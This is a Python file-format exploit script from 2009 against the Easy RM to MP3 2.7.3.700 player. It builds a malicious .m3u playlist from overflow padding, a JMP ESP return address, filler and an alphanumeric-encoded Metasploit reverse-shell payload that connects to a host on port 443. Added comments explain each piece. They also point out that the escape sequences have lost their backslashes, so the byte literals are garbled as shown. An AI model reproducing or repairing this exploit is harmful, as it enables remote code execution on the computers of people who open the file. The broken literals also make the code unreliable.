
# Title : Easy RM to MP3 2.7.3.700 BoF Exploit
# Published : 2009-12-23
# Author : Ron Henry


#!/usr/bin/python

# Exploit against Easy RM to MP3 2.7.3.700
# 12.2.2009
# Author: Ron Henry - rlh@ciphermonk.net - dijital1
# Version: Easy RM to MP3 2.7.3.700
# Tested against WinXP SP3 - English

# Historical listing (2009) of a file-format overflow: the script writes a
# single oversized .m3u playlist; opening it in the vulnerable player is the
# trigger. The weakness is an unbounded copy of a playlist entry into a
# fixed-size stack buffer, so the lines below are just concatenated padding,
# a return address, filler and an encoded payload, in that order.
# Name of the playlist file produced at the bottom of the script.
outputfile = "astley.m3u"

# `shellcode` holds the WHOLE file body, not only the payload: padding,
# return address, filler and the encoded payload are appended in turn.
# 26071 bytes of padding; per the author, this is the distance to the saved
# return address on Windows XP SP3 for this build.
shellcode="A" * 26071 #Offset to EIP - Windows XP SP3
# Intended as a 4-byte pointer to a JMP ESP in SHELL32.dll (0x7CA09625,
# little-endian). NOTE(review): as listed here the escape sequences have lost
# their backslashes, so this literal is the 12 printable characters
# "x25x96xa0x7c" rather than the 4 bytes the comment describes.
shellcode+="x25x96xa0x7c" # JMP ESP - SHELL32.dll WinXP SP3 0x7CA09625
# 32 bytes of filler ("CAFE" repeated 8 times); the author labels it a NOP sled.
shellcode+="CAFE" * 8  # 32 Byte NOP Sled
# Payload generated with the Metasploit command below (reverse shell to the
# author's lab host, alphanumeric-uppercase encoded). The same backslash loss
# applies to every escape in this literal.
#msfpayload windows/shell_reverse_tcp LHOST=10.250.10.126 LPORT=443 R | msfencode -e x86/alpha_upper -t c
shellcode+=("x89xe7xdaxdexd9x77xf4x5bx53x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4ax48x4cx49x45x50"
"x43x30x45x50x43x50x4dx59x4ax45x50x31x48x52x43"
"x54x4cx4bx51x42x46x50x4cx4bx51x42x44x4cx4cx4b"
"x46x32x45x44x4cx4bx43x42x46x48x44x4fx4fx47x51"
"x5ax47x56x50x31x4bx4fx50x31x4fx30x4ex4cx47x4c"
"x45x31x43x4cx44x42x46x4cx51x30x4fx31x48x4fx44"
"x4dx45x51x4fx37x4bx52x4cx30x50x52x50x57x4cx4b"
"x51x42x44x50x4cx4bx47x32x47x4cx45x51x48x50x4c"
"x4bx51x50x42x58x4bx35x4fx30x43x44x51x5ax43x31"
"x4ex30x50x50x4cx4bx51x58x44x58x4cx4bx50x58x47"
"x50x43x31x4ex33x4dx33x47x4cx47x39x4cx4bx46x54"
"x4cx4bx43x31x4ex36x46x51x4bx4fx50x31x4fx30x4e"
"x4cx49x51x48x4fx44x4dx45x51x49x57x50x38x4dx30"
"x43x45x4cx34x43x33x43x4dx4ax58x47x4bx43x4dx51"
"x34x44x35x4ax42x46x38x4cx4bx51x48x46x44x45x51"
"x4ex33x45x36x4cx4bx44x4cx50x4bx4cx4bx51x48x45"
"x4cx45x51x49x43x4cx4bx44x44x4cx4bx45x51x4ex30"
"x4dx59x50x44x51x34x46x44x51x4bx51x4bx45x31x46"
"x39x51x4ax46x31x4bx4fx4dx30x46x38x51x4fx51x4a"
"x4cx4bx44x52x4ax4bx4cx46x51x4dx43x58x47x43x50"
"x32x43x30x45x50x43x58x44x37x44x33x50x32x51x4f"
"x51x44x42x48x50x4cx44x37x47x56x44x47x4bx4fx48"
"x55x4fx48x4ax30x45x51x45x50x43x30x46x49x48x44"
"x51x44x46x30x43x58x51x39x4dx50x42x4bx43x30x4b"
"x4fx49x45x50x50x46x30x46x30x46x30x51x50x46x30"
"x51x50x46x30x42x48x4bx5ax44x4fx49x4fx4bx50x4b"
"x4fx49x45x4bx39x4fx37x45x38x44x4ax4ax5ax45x5a"
"x43x4ex42x48x45x52x43x30x43x31x4fx4bx4dx59x4d"
"x36x43x5ax44x50x51x46x50x57x45x38x4cx59x4ex45"
"x43x44x43x51x4bx4fx49x45x45x38x45x33x42x4dx45"
"x34x45x50x4bx39x4ax43x51x47x51x47x46x37x50x31"
"x4bx46x43x5ax45x42x50x59x51x46x4dx32x4bx4dx45"
"x36x49x57x51x54x46x44x47x4cx43x31x43x31x4cx4d"
"x51x54x46x44x44x50x49x56x43x30x47x34x51x44x46"
"x30x46x36x46x36x51x46x47x36x51x46x50x4ex50x56"
"x51x46x50x53x50x56x42x48x43x49x48x4cx47x4fx4c"
"x46x4bx4fx49x45x4bx39x4bx50x50x4ex51x46x50x46"
"x4bx4fx46x50x45x38x44x48x4bx37x45x4dx43x50x4b"
"x4fx48x55x4fx4bx4cx30x4ex55x4ex42x50x56x45x38"
"x49x36x4cx55x4fx4dx4dx4dx4bx4fx4ex35x47x4cx44"
"x46x43x4cx45x5ax4dx50x4bx4bx4bx50x44x35x44x45"
"x4fx4bx51x57x44x53x42x52x42x4fx43x5ax43x30x46"
"x33x4bx4fx48x55x44x4ax41x41")

# Write the assembled body to the playlist file in one shot. The handle is
# opened and closed explicitly (Python 2 era); a `with` block would guarantee
# closure on error.
FILE = open(outputfile, "w")
FILE.write(shellcode)
FILE.close()